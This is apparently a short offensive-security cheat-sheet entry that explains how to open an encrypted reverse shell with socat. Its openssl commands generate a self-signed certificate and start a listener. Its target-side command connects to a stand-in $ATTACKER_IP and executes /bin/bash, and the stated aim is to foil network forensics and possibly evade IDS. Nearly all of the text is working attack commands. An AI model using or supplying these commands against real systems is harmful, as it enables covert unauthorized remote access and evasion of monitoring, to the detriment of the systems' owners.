socat can make encrypted connections, which foil after-the-fact network analysis and may circumvent IDS entirely.
# Generate a self-signed certificate.
#
openssl req --newkey rsa:2048 -nodes \
-keyout shell.key -x509 -days 362 \
-out shell.crt
# Create a PEM file combining the certificate and key.
#
cat shell.key shell.crt > shell.pem
# Start a listener.
#
socat OPENSSL-LISTEN:$LISTENER_PORT,cert=shell.pem,verify=0 -
# Start the reverse shell on the target.
#
socat OPENSSL:$ATTACKER_IP:$LISTENER_PORT,verify=0 EXEC:"/bin/bash -li"The verify=0 directive turns off certificate validation, so this isn’t a “secure” connection in the sense that it’s been authenticated, but it is secure in the sense that it’s encrypted.